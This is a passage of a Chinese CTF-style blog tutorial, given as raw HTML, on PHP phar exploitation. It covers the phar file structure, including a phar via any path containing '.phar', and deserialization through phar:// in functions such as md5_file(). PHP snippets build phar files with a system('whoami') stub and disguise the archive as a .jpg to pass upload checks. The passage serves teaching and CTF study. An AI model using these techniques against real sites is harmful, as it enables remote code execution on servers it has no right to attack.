data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-300x137.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-122\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"UX9nn\">\u6587\u4ef6\u7ed3\u6784<\/h4>\n\n\n\n<pre id=\"eNmUl\" class=\"wp-block-code\"><code>stub:phar\u6587\u4ef6\u7684\u6807\u5fd7\uff0c\u5fc5\u987b\u4ee5 xxx 
__HALT_COMPILER();?&gt; \u7ed3\u5c3e\uff0c\u5426\u5219\u65e0\u6cd5\u8bc6\u522b\u3002xxx\u53ef\u4ee5\u4e3a\u81ea\u5b9a\u4e49\u5185\u5bb9\u3002\n\/\/\u7b80\u5355\u5730\u8bf4\u5c31\u662f\u544a\u8bc9\u7cfb\u7edf\u81ea\u5df1\u662f\u4e00\u4e2a\u4ec0\u4e48\u6837\u7684\u6587\u4ef6,\u58f0\u660e\u6587\u4ef6\u540e\u7f00\n\nmanifest:phar\u6587\u4ef6\u672c\u8d28\u4e0a\u662f\u4e00\u79cd\u538b\u7f29\u6587\u4ef6\uff0c\u5176\u4e2d\u6bcf\u4e2a\u88ab\u538b\u7f29\u6587\u4ef6\u7684\u6743\u9650\u3001\u5c5e\u6027\u7b49\u4fe1\u606f\u90fd\u653e\u5728\u8fd9\u90e8\u5206\u3002\u8fd9\u90e8\u5206\u8fd8\u4f1a\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u81ea\u5b9a\u4e49\u7684meta-data\uff0c\u8fd9\u662f\u6f0f\u6d1e\u5229\u7528\u6700\u6838\u5fc3\u7684\u5730\u65b9\u3002\n\/\/\u5b58\u653e\u5e8f\u5217\u5316\u7684\u5185\u5bb9\n\ncontent:\u88ab\u538b\u7f29\u6587\u4ef6\u7684\u5185\u5bb9\n\nsignature (\u53ef\u7a7a):\u7b7e\u540d\uff0c\u653e\u5728\u672b\u5c3e\u3002<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"470\" data-attachment-id=\"123\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=123\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93.png\" data-orig-size=\"1909,876\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-300x138.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-123\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"tvqlp\">\u751f\u6210phar\u6587\u4ef6<\/h4>\n\n\n\n<pre id=\"Kthsn\" class=\"wp-block-code\"><code>&lt;?php\n$phar = new Phar('exploit.phar');\n$phar-&gt;startBuffering();\n\n$stub = &lt;&lt;&lt;'STUB'\n&lt;?php\n    system('whoami');\n    __HALT_COMPILER();\n?&gt;\nSTUB;\n\n$phar-&gt;setStub($stub);\n$phar-&gt;addFromString('test.txt', 'test');\n$phar-&gt;stopBuffering();\n\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" 
width=\"790\" height=\"102\" data-attachment-id=\"124\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=124\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" data-orig-size=\"790,102\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94-300x39.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-124\"  sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WWEx8\">php\u7279\u6027<\/h4>\n\n\n\n<p id=\"ua64e6e81\">\u8be6\u7ec6\u539f\u7406\u89c1<\/p>\n\n\n\n<p><a href=\"https:\/\/fushuling.com\/index.php\/2025\/07\/30\/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web\">https:\/\/fushuling.com\/index.php\/2025\/07\/30\/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web<\/a><\/p>\n\n\n\n<p id=\"u07e709b2\">\u5f53\u6211\u4eecinclude phar\u6587\u4ef6\u65f6\uff0cphp\u4f1a\u81ea\u52a8\u89e3\u538b\u8fd9\u4e2a\u538b\u7f29\u6587\u4ef6\uff0c\u6240\u4ee5\u6700\u540e\u76f8\u5f53\u4e8e\u662f\u76f4\u63a5include\u8fd9\u4e2aphar\u6587\u4ef6<\/p>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" data-attachment-id=\"125\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=125\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95.png\" data-orig-size=\"1376,347\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-300x76.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-125\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"u874cd01b\">\u6211\u4eec\u5b8c\u5168\u4e0d\u9700\u8981\u4fdd\u8bc1\u6700\u540einclude\u7684\u662f\u4e00\u4e2axxx.phar.gzip\u6587\u4ef6\uff0c\u53ea\u8981\u6587\u4ef6\u540d\u91cc\u6709.phar\u5373\u53ef\uff0c\u6240\u4ee5\u8bf4\u65e0\u8bba\u6211\u4eec\u662finclude 1.phar.png\u8fd8\u662f1.phar.html\u5747\u53ef\u4ee5\u6b63\u5e38rce<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"280\" data-attachment-id=\"126\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=126\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96.png\" data-orig-size=\"1475,403\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-126\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubd51d211\">\u751a\u81f3\u53ea\u8981\u5305\u542b\u7684\u8def\u5f84\u91cc\u5e26\u4e86.phar\u8fd9\u51e0\u4e2a\u5b57\u5c31\u80fd\u89e3\u6790 \u54ea\u6015\u662f\u76ee\u5f55\u4e5f\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"276\" data-attachment-id=\"127\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=127\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97.png\" data-orig-size=\"1410,380\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-300x81.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png\" 
data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-127\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"GTNem\">Phar\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u539f\u7406<\/h4>\n\n\n\n<p id=\"u5e1cbccc\"><code>manifest<\/code>\u538b\u7f29\u6587\u4ef6\u7684\u5c5e\u6027\u7b49\u4fe1\u606f\uff0c\u4ee5\u5e8f\u5217\u5316\u5b58\u50a8\uff0c\u5b58\u5728\u4e00\u6bb5\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u469cbf13\">\u8c03\u7528<code>phar<\/code>\u4f2a\u534f\u8bae\uff0c\u53ef\u8bfb\u53d6<code>.phar<\/code>\u6587\u4ef6<\/p>\n\n\n\n<p id=\"u38b7acc8\"><code>phar<\/code>\u534f\u8bae\u89e3\u6790\u6587\u4ef6\u65f6\uff0c\u4f1a\u81ea\u52a8\u89e6\u53d1\u5bf9<code>manifest<\/code>\u5b57\u6bb5\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u8fdb\u884c\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<p id=\"u9a2cd0a3\"><code>phar<\/code>\u9700\u8981\u6ee1\u8db3 PHP &gt;= 5.2\uff0c\u5728<code>php.ini<\/code>\u4e2d\u5c06<code>phar.readonly<\/code>\u8bbe\u4e3a<code>Off<\/code>（<code>phar.readonly<\/code>只限制生成、写入<code>.phar<\/code>文件，通过<code>phar:\/\/<\/code>读取时不需要关闭；另外自 PHP 8.0 起，<code>phar:\/\/<\/code>读取文件时不再自动反序列化元数据，只有显式调用<code>getMetadata()<\/code>才会反序列化）<\/p>\n\n\n\n<p id=\"uceae5a48\">\u4ee5\u4e0b\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u53d7\u5230\u5f71\u54cd\u7684\u51fd\u6570\uff08\u5373\u53ef\u4ee5\u4f7f\u7528<code>phar<\/code>\u4f2a\u534f\u8bae\u8bfb\u53d6<code>.phar<\/code>\u6587\u4ef6\u7684\u51fd\u6570\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"328\" data-attachment-id=\"128\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=128\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98.png\" data-orig-size=\"1278,409\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-300x96.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-128\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"gDugm\">\u4f8b\u9898<\/h5>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"711\" height=\"396\" data-attachment-id=\"129\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=129\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" data-orig-size=\"711,396\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99-300x167.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-129\"  sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"85\" data-attachment-id=\"130\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=130\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" data-orig-size=\"566,85\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100-300x45.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-130\"  sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uaf2960d7\">\u8fd9\u9053\u9898md5_file()\u51fd\u6570\u914d\u5408phar:\/\/\u4f2a\u534f\u8bae\u53ef\u4ee5\u89e6\u53d1\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<p id=\"u195e5d83\">\u5e76\u4e14upload.php\u53ef\u4ee5\u4e0a\u4f20\u56fe\u7247\u6587\u4ef6<\/p>\n\n\n\n<p id=\"u3c0a67eb\">\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u5229\u7528\u4e4b\u524d\u63d0\u8fc7\u7684php\u7279\u6027<\/p>\n\n\n\n<p id=\"u203cc5cc\">\u5c06.phar\u6587\u4ef6\u91cd\u547d\u540d\u4e3a.jpg \u4f7f\u7528phar:\/\/\u534f\u8bae\u65f6\u4ecd\u4f1a\u8bc6\u522b\u4e3aphar\u6587\u4ef6<\/p>\n\n\n\n<pre id=\"LkjoM\" class=\"wp-block-code\"><code>&lt;?php\nclass TestObject 
{\n}\n$phar = new Phar('exploit.phar.jpg');\n$phar-&gt;startBuffering();\n$phar-&gt;setStub('&lt;?php __HALT_COMPILER(); ?&gt;');\n$obj = new TestObject();\n$phar-&gt;setMetadata($obj);\n$phar-&gt;addFromString('test.txt', 'text');\n$phar-&gt;stopBuffering();\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"226\" data-attachment-id=\"131\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=131\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" data-orig-size=\"823,226\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 
